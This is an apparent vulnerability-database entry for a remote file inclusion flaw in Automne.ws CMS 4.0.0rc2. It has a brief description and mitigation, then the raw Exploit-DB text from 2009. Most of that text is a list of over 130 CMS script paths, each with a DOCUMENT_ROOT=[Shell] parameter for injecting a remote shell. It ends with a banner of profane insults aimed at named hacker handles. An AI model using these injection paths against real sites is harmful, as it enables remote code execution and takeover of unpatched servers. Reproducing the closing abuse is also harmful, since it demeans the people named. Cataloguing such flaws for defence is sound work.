Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability

vendor:
Automne.ws CMS
by:
1nd0n3s14n l4m3r
7.5
CVSS
HIGH
RFI (Remote File Inclusion)
CWE
Product Name: Automne.ws CMS
Affected Version From: 4.0.0rc2
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:automne:automne:4.0.0rc2
Metasploit:
Other Scripts:
Platforms Tested:
2009
Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability

The vulnerability is caused by the lack of proper sanitization of the variable $_SERVER["DOCUMENT_ROOT"] in multiple PHP files. An attacker can exploit this vulnerability by injecting a malicious file path in the DOCUMENT_ROOT parameter to execute arbitrary remote files.
Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in PHP scripts. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
Source
Exploit-DB raw data:

##########################################################################
##          Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability          ##
##                  Created By 1nd0n3s14n l4m3r                         ##
##                      (c) -- 14/12/2oo9                               ##
##########################################################################
##  No Sanitize Variable $_SERVER["DOCUMENT_ROOT"]                      ##
##                                                                      ##
##automne/imagezoom.php?DOCUMENT_ROOT=[Shell]                           ##
##automne/is_alive.php?DOCUMENT_ROOT=[Shell]                            ##
##automne/admin/backtrace.php?DOCUMENT_ROOT=[Shell]                     ##
##automne/admin/favorites-sidepanel.php?DOCUMENT_ROOT=[Shell]           ##
##automne/admin/file-infos.php?DOCUMENT_ROOT=[Shell]                    ##
##automne/admin/group.php?DOCUMENT_ROOT=[Shell]                         ##
##automne/admin/groups.php?DOCUMENT_ROOT=[Shell]                        ##
##automne/admin/groups-controler.php?DOCUMENT_ROOT=[Shell]              ##
##automne/admin/groups-datas.php?DOCUMENT_ROOT=[Shell]                  ##
##automne/admin/help.php?DOCUMENT_ROOT=[Shell]                          ##
##automne/admin/ie6.php?DOCUMENT_ROOT=[Shell]                           ##
##automne/admin/image-controler.php?DOCUMENT_ROOT=[Shell]               ##
##automne/admin/index.php?DOCUMENT_ROOT=[Shell]                         ##
##automne/admin/login.php?DOCUMENT_ROOT=[Shell]                         ##
##automne/admin/login-form.php?DOCUMENT_ROOT=[Shell]                    ##
##automne/admin/logs.php?DOCUMENT_ROOT=[Shell]                          ##
##automne/admin/logs-datas.php?DOCUMENT_ROOT=[Shell]                    ##
##automne/admin/module.php?DOCUMENT_ROOT=[Shell]                        ##
##automne/admin/module-controler.php?DOCUMENT_ROOT=[Shell]              ##
##automne/admin/module-parameters.php?DOCUMENT_ROOT=[Shell]             ##
##automne/admin/modules-categories.php?DOCUMENT_ROOT=[Shell]            ##
##automne/admin/modules-categories-controler.php?DOCUMENT_ROOT=[Shell]  ##
##automne/admin/modules-categories-nodes.php?DOCUMENT_ROOT=[Shell]      ##
##automne/admin/modules-categories-rights.php?DOCUMENT_ROOT=[Shell]     ##
##automne/admin/modules-category.php?DOCUMENT_ROOT=[Shell]              ##
##automne/admin/navigator.php?DOCUMENT_ROOT=[Shell]                     ##
##automne/admin/no-pages.php?DOCUMENT_ROOT=[Shell]                      ##
##automne/admin/no-rights.php?DOCUMENT_ROOT=[Shell]                     ##
##automne/admin/page-add.php?DOCUMENT_ROOT=[Shell]                      ##
##automne/admin/page-content.php?DOCUMENT_ROOT=[Shell]                  ##
##automne/admin/page-content-block-file.php?DOCUMENT_ROOT=[Shell]       ##
##automne/admin/page-content-block-flash.php?DOCUMENT_ROOT=[Shell]      ##
##automne/admin/page-content-block-image.php?DOCUMENT_ROOT=[Shell]      ##
##automne/admin/page-content-controler.php?DOCUMENT_ROOT=[Shell]        ##
##automne/admin/page-controler.php?DOCUMENT_ROOT=[Shell]                ##
##automne/admin/page-copy.php?DOCUMENT_ROOT=[Shell]                     ##
##automne/admin/page-infos.php?DOCUMENT_ROOT=[Shell]                    ##
##automne/admin/page-logs.php?DOCUMENT_ROOT=[Shell]                     ##
##automne/admin/page-previsualization.php?DOCUMENT_ROOT=[Shell]         ##
##automne/admin/page-properties.php?DOCUMENT_ROOT=[Shell]               ##
##automne/admin/page-redirect-info.php?DOCUMENT_ROOT=[Shell]            ##
##automne/admin/page-rows-datas.php?DOCUMENT_ROOT=[Shell]               ##
##automne/admin/page-templates-datas.php?DOCUMENT_ROOT=[Shell]          ##
##automne/admin/phpinfo.php?DOCUMENT_ROOT=[Shell]                       ##
##automne/admin/resource-controler.php?DOCUMENT_ROOT=[Shell]            ##
##automne/admin/row.php?DOCUMENT_ROOT=[Shell]                           ##
##automne/admin/row-help.php?DOCUMENT_ROOT=[Shell]                      ##
##automne/admin/rows-controler.php?DOCUMENT_ROOT=[Shell]                ##
##automne/admin/scripts.php?DOCUMENT_ROOT=[Shell]                       ##
##automne/admin/search.php?DOCUMENT_ROOT=[Shell]                        ##
##automne/admin/search-datas.php?DOCUMENT_ROOT=[Shell]                  ##
##automne/admin/search-pages.php?DOCUMENT_ROOT=[Shell]                  ##
##automne/admin/server.php?DOCUMENT_ROOT=[Shell]                        ##
##automne/admin/server-check.php?DOCUMENT_ROOT=[Shell]                  ##
##automne/admin/server-scripts.php?DOCUMENT_ROOT=[Shell]                ##
##automne/admin/server-scripts-controler.php?DOCUMENT_ROOT=[Shell]      ##
##automne/admin/side-panel.php?DOCUMENT_ROOT=[Shell]                    ##
##automne/admin/stat.php?DOCUMENT_ROOT=[Shell]                          ##
##automne/admin/template.php?DOCUMENT_ROOT=[Shell]                      ##
##automne/admin/template-help.php?DOCUMENT_ROOT=[Shell]                 ##
##automne/admin/template-print.php?DOCUMENT_ROOT=[Shell]                ##
##automne/admin/templates.php?DOCUMENT_ROOT=[Shell]                     ##
##automne/admin/templates-controler.php?DOCUMENT_ROOT=[Shell]           ##
##automne/admin/templates-file.php?DOCUMENT_ROOT=[Shell]                ##
##automne/admin/templates-files.php?DOCUMENT_ROOT=[Shell]               ##
##automne/admin/templates-files-controler.php?DOCUMENT_ROOT=[Shell]     ##
##automne/admin/templates-files-nodes.php?DOCUMENT_ROOT=[Shell]         ##
##automne/admin/templates-page.php?DOCUMENT_ROOT=[Shell]                ##
##automne/admin/templates-row.php?DOCUMENT_ROOT=[Shell]                 ##
##automne/admin/templates-rows.php?DOCUMENT_ROOT=[Shell]                ##
##automne/admin/tree.php?DOCUMENT_ROOT=[Shell]                          ##
##automne/admin/tree-duplicate.php?DOCUMENT_ROOT=[Shell]                ##
##automne/admin/tree-lineage.php?DOCUMENT_ROOT=[Shell]                  ##
##automne/admin/tree-nodes.php?DOCUMENT_ROOT=[Shell]                    ##
##automne/admin/upload-controler.php?DOCUMENT_ROOT=[Shell]              ##
##automne/admin/user.php?DOCUMENT_ROOT=[Shell]                          ##
##automne/admin/user-admin-rights.php?DOCUMENT_ROOT=[Shell]             ##
##automne/admin/user-modules-rights.php?DOCUMENT_ROOT=[Shell]           ##
##automne/admin/users.php?DOCUMENT_ROOT=[Shell]                         ##
##automne/admin/users-controler.php?DOCUMENT_ROOT=[Shell]               ##
##automne/admin/users-datas.php?DOCUMENT_ROOT=[Shell]                   ##
##automne/admin/users-groups.php?DOCUMENT_ROOT=[Shell]                  ##
##automne/admin/validations.php?DOCUMENT_ROOT=[Shell]                   ##
##automne/admin/validations-controler.php?DOCUMENT_ROOT=[Shell]         ##
##automne/admin/validations-datas.php?DOCUMENT_ROOT=[Shell]             ##
##automne/admin/validations-sidepanel.php?DOCUMENT_ROOT=[Shell]         ##
##automne/admin/modules/cms_aliases/index.php?DOCUMENT_ROOT=[Shell]     ####
##automne/admin/modules/cms_aliases/alias.php?DOCUMENT_ROOT=[Shell]     ####
##automne/admin/modules/cms_forms/content_block.php?DOCUMENT_ROOT=[Shell] ##
##automne/admin/modules/cms_forms/item.php?DOCUMENT_ROOT=[Shell]          ##
##automne/admin/modules/cms_forms/csv.php?DOCUMENT_ROOT=[Shell]           ##
##automne/admin/modules/cms_forms/itemactions.php?DOCUMENT_ROOT=[Shell]   ##
##automne/admin/modules/cms_forms/index.php?DOCUMENT_ROOT=[Shell]         ##
##automne/admin/modules/cms_forms/items.php?DOCUMENT_ROOT=[Shell]         ##
##automne/admin/modules/polymod/items-controler.php?DOCUMENT_ROOT=[Shell] ##
##automne/admin/modules/polymod/list-datas.php?DOCUMENT_ROOT=[Shell]      ##
##automne/admin/modules/polymod/search.php?DOCUMENT_ROOT=[Shell]          ##
##automne/admin/modules/polymod/content-block.php?DOCUMENT_ROOT=[Shell]   ##
##automne/admin/modules/polymod/item.php?DOCUMENT_ROOT=[Shell]            ##
##automne/admin/modules/polymod/item-selector.php?DOCUMENT_ROOT=[Shell]   ####
##automne/admin/modules/polymod/list-objects.php?DOCUMENT_ROOT=[Shell]    ####
##automne/admin/modules/polymod/update-definitions.php?DOCUMENT_ROOT=[Shell]##
##automne/admin/modules/polymod/fckplugin.php?DOCUMENT_ROOT=[Shell]         ##
##automne/admin/modules/polymod/items.php?DOCUMENT_ROOT=[Shell]             ##
##automne/admin/modules/polymod/list-categories.php?DOCUMENT_ROOT=[Shell]   ##
##automne/admin/modules/polymod/polymod-help.php?DOCUMENT_ROOT=[Shell]      ##
##automne/admin-v3/getValidationByID.php?DOCUMENT_ROOT=[Shell]              ##
##automne/admin-v3/linxbuilder.php?DOCUMENT_ROOT=[Shell]                    ##
##automne/admin-v3/module_parameters.php?DOCUMENT_ROOT=[Shell]              ##
##automne/admin-v3/modulecategories_usersgroups.php?DOCUMENT_ROOT=[Shell]   ##
##automne/admin-v3/patch.php?DOCUMENT_ROOT=[Shell]                          ##
##automne/admin-v3/polymod_field.php?DOCUMENT_ROOT=[Shell]                  ##
##automne/admin-v3/polymod_plugin_definition.php?DOCUMENT_ROOT=[Shell]      ##
##automne/admin-v3/tree.php?DOCUMENT_ROOT=[Shell]                           ##
##automne/admin-v3/wysiwyg.php?DOCUMENT_ROOT=[Shell]                        ##
##automne/admin-v3/archives.php?DOCUMENT_ROOT=[Shell]                       ##
##automne/admin-v3/logs.php?DOCUMENT_ROOT=[Shell]                           ##
##automne/admin-v3/modulecategories.php?DOCUMENT_ROOT=[Shell]               ##
##automne/admin-v3/modulecategory.php?DOCUMENT_ROOT=[Shell]                 ##
##automne/admin-v3/patch_error_correction.php?DOCUMENT_ROOT=[Shell]         ##
##automne/admin-v3/polymod_object.php?DOCUMENT_ROOT=[Shell]                 ##
##automne/admin-v3/polymod_rss_definition.php?DOCUMENT_ROOT=[Shell]         ##
##automne/admin-v3/website.php?DOCUMENT_ROOT=[Shell]                        ##
##automne/admin-v3/entry.php?DOCUMENT_ROOT=[Shell]                          ##
##automne/admin-v3/index.php?DOCUMENT_ROOT=[Shell]                          ##
##automne/admin-v3/module.php?DOCUMENT_ROOT=[Shell]                         ##
##automne/admin-v3/modulecategories_usersgroup.php?DOCUMENT_ROOT=[Shell]    ##
##automne/admin-v3/modules_admin.php?DOCUMENT_ROOT=[Shell]                  ##
##automne/admin-v3/polymod_object_infos.php?DOCUMENT_ROOT=[Shell]           ##
##automne/admin-v3/serverResponse.php?DOCUMENT_ROOT=[Shell]                 ##
##automne/admin-v3/websites.php?DOCUMENT_ROOT=[Shell]                       ##
##automne/classes/polymodFrontEnd.php?DOCUMENT_ROOT=[Shell]                 ##
##js/serverCall.php?DOCUMENT_ROOT=[Shell]                                   ##
##############################################################################
## ~ 9r33tZ T0 : > 4ll 1nd0n3s14n r34l h4ck3r ...                           ##
## ~ fuck      : > x-ace [ m0th3r fuck3r 1nd0n3s14n r34l sn1ch ]            ##
##               > tomahawk [b19 l4m3rs]                                    ##
##               > 1nd0n3s14n j00ml4 t0k3n h4ck3r                           ##
## ~ n0t3      : > sh0w m3 th3 c0d3 x-ace fuck3r 1f y0u r34l h4ck3r         ##
##                 y0u 4r3 n0t h4ck3r, y0u 4r3 r34l b1g l4m3rs              ##
##############################################################################